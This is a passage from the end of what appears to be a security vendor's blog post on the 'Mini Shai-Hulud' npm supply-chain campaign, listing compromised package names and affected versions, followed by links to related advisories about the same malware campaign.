  • @tanstack/start-storage-context: 1.166.38, 1.166.41
  • @tanstack/valibot-adapter: 1.166.12, 1.166.15
  • @tanstack/virtual-file-routes: 1.161.10, 1.161.13
  • @tanstack/vue-router: 1.169.5, 1.169.8
  • @tanstack/vue-router-devtools: 1.166.16, 1.166.19
  • @tanstack/vue-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/vue-start: 1.167.61, 1.167.64
  • @tanstack/vue-start-client: 1.166.46, 1.166.49
  • @tanstack/vue-start-server: 1.166.50, 1.166.53
  • @tanstack/zod-adapter: 1.166.12, 1.166.15
  • @taskflow-corp/cli: 0.1.24, 0.1.25, 0.1.26, 0.1.27, 0.1.28, 0.1.29
  • @tolka/cli: 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6
  • @uipath/access-policy-sdk: 0.3.1
  • @uipath/access-policy-tool: 0.3.1
  • @uipath/admin-tool: 0.1.1
  • @uipath/agent-sdk: 1.0.2
  • @uipath/agent-tool: 1.0.1
  • @uipath/agent.sdk: 0.0.18
  • @uipath/aops-policy-tool: 0.3.1
  • @uipath/ap-chat: 1.5.7
  • @uipath/api-workflow-tool: 1.0.1
  • @uipath/apollo-core: 5.9.2
  • @uipath/apollo-react: 4.24.5
  • @uipath/apollo-wind: 2.16.2
  • @uipath/auth: 1.0.1
  • @uipath/case-tool: 1.0.1
  • @uipath/cli: 1.0.1
  • @uipath/codedagent-tool: 1.0.1
  • @uipath/codedagents-tool: 0.1.12
  • @uipath/codedapp-tool: 1.0.1
  • @uipath/common: 1.0.1
  • @uipath/context-grounding-tool: 0.1.1
  • @uipath/data-fabric-tool: 1.0.2
  • @uipath/docsai-tool: 1.0.1
  • @uipath/filesystem: 1.0.1
  • @uipath/flow-tool: 1.0.2
  • @uipath/functions-tool: 1.0.1
  • @uipath/gov-tool: 0.3.1
  • @uipath/identity-tool: 0.1.1
  • @uipath/insights-sdk: 1.0.1
  • @uipath/insights-tool: 1.0.1
  • @uipath/integrationservice-sdk: 1.0.2
  • @uipath/integrationservice-tool: 1.0.2
  • @uipath/llmgw-tool: 1.0.1
  • @uipath/maestro-sdk: 1.0.1
  • @uipath/maestro-tool: 1.0.1
  • @uipath/orchestrator-tool: 1.0.1
  • @uipath/packager-tool-apiworkflow: 0.0.19
  • @uipath/packager-tool-bpmn: 0.0.9
  • @uipath/packager-tool-case: 0.0.9
  • @uipath/packager-tool-connector: 0.0.19
  • @uipath/packager-tool-flow: 0.0.19
  • @uipath/packager-tool-functions: 0.1.1
  • @uipath/packager-tool-webapp: 1.0.6
  • @uipath/packager-tool-workflowcompiler: 0.0.16
  • @uipath/packager-tool-workflowcompiler-browser: 0.0.34
  • @uipath/platform-tool: 1.0.1
  • @uipath/project-packager: 1.1.16
  • @uipath/resource-tool: 1.0.1
  • @uipath/resourcecatalog-tool: 0.1.1
  • @uipath/resources-tool: 0.1.11
  • @uipath/robot: 1.3.4
  • @uipath/rpa-legacy-tool: 1.0.1
  • @uipath/rpa-tool: 0.9.5
  • @uipath/solution-packager: 0.0.35
  • @uipath/solution-tool: 1.0.1
  • @uipath/solutionpackager-sdk: 1.0.11
  • @uipath/solutionpackager-tool-core: 0.0.34
  • @uipath/tasks-tool: 1.0.1
  • @uipath/telemetry: 0.0.7
  • @uipath/test-manager-tool: 1.0.2
  • @uipath/tool-workflowcompiler: 0.0.12
  • @uipath/traces-tool: 1.0.1
  • @uipath/ui-widgets-multi-file-upload: 1.0.1
  • @uipath/uipath-python-bridge: 1.0.1
  • @uipath/vertical-solutions-tool: 1.0.1
  • @uipath/vss: 0.1.6
  • @uipath/widget.sdk: 1.2.3
  • agentwork-cli: 0.1.4, 0.1.5
  • ai-figure: 0.5.0, 0.6.0
  • amapcn: 0.2.2, 0.3.2
  • ast-plugin: 0.1.7, 0.2.7
  • babel-plugin-version: 0.3.3, 0.4.3
  • boring-avatars-vanilla: 1.1.2, 1.2.2
  • byte-parser: 1.1.0, 1.2.0
  • canvas-nest.js: 2.1.4, 2.2.4
  • cmux-agent-mcp: 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8
  • cross-stitch: 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7
  • echarts-for-react: 3.1.7, 3.2.7
  • filesize.js: 2.1.0, 2.2.0
  • fixed-round: 1.1.2, 1.2.2
  • gantt-for-react: 0.3.0, 0.4.0
  • git-branch-selector: 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.3.7
  • git-git-git: 1.0.10, 1.0.11, 1.0.12, 1.0.8, 1.0.9
  • guardrails-ai: 0.10.1
  • intercom-client: 7.0.4
  • jest-canvas-mock: 2.6.3, 2.7.3
  • jest-date-mock: 1.1.11, 1.2.11
  • jest-electron: 0.2.12, 0.3.12
  • jest-expect: 0.1.1, 0.2.1
  • jest-less-loader: 0.3.0, 0.4.0
  • jest-random-mock: 1.1.0, 1.2.0
  • jest-url-loader: 0.2.0, 0.3.0
  • lightning: 2.6.2, 2.6.3
  • limit-size: 0.2.4, 0.3.4
  • lint-md: 0.3.0, 0.4.0
  • lint-md-cli: 0.2.2, 0.3.2
  • mbt: 1.2.48
  • mcp-echarts: 0.8.1, 0.9.1
  • mcp-mermaid: 0.5.1, 0.6.1
  • mistralai: 2.4.6
  • miz: 1.1.1, 1.2.1
  • ml-toolkit-ts: 1.0.4, 1.0.5
  • nextmove-mcp: 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7
  • onfire.js: 2.1.1, 2.2.1
  • openclaw-cn: 0.3.0
  • react-adsense: 0.2.0, 0.3.0
  • relationship.js: 1.3.9, 1.4.9
  • ribbon.js: 1.1.2
  • safe-action: 0.8.3, 0.8.4
  • size-sensor: 1.1.4, 1.2.4
  • slice.js: 1.2.1, 1.3.1
  • timeago-react: 3.1.7, 3.2.7
  • timeago.js: 4.1.2, 4.2.2
  • ts-dna: 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5
  • uri-parse: 1.1.0, 1.2.0
  • word-width: 1.1.1, 1.2.1
  • wot-api: 0.8.1, 0.8.2, 0.8.3, 0.8.4
  • xmorse: 1.1.0, 1.2.0
Last updated on:
May 19, 2026
Share:

https://www.aikido.dev/blog/mini-shai-hulud-antv-npm-supply-chain-attack

Text Link

Subscribe for news

4.7/5
Tired of false positives?

Try Aikido like 100k others.
Start Now
Get a personalized walkthrough

Trusted by 100k+ teams

Book Now
Scan your app for IDORs and real attack paths

Trusted by 100k+ teams

Start Scanning
See how AI pentests your app

Trusted by 100k+ teams

Start Testing

Start Now
Similar Posts
See all
See all
May 12, 2026
Vulnerabilities & Threats

Mini Shai-Hulud Is Back: npm Worm Hits over 160 Packages, including Mistral and Tanstack

Mini Shai-Hulud is back, compromising 169 npm packages across TanStack, UiPath, Squawk, and more to steal developer and CI/CD secrets, then spread through trusted publishing workflows.

#
Malware
April 30, 2026
Vulnerabilities & Threats

Popular PyTorch Lightning Package Compromised by Mini Shai-Hulud

Malware found in popular PyTorch Lightning version 2.6.2 and 2.6.3, stealing credentials, crypto wallets, and VPN configs as part of the Mini Shai-Hulud campaign.

#
Malware
April 29, 2026
Vulnerabilities & Threats

Mini Shai-Hulud Targets SAP npm Packages With a Bun-Based Secret Stealer

Compromised SAP npm packages use a Bun-based preinstall payload to steal GitHub, npm, cloud, and CI secrets, then spread via GitHub using OhNoWhatsGoingOnWithGitHub.

#
Malware
#
NPM

Get secure now

Secure your code, cloud, and runtime in one central system.
Find and fix vulnerabilities fast automatically.

Start Scanning
No CC required
Book a demo
No credit card required | Scan results in 32secs.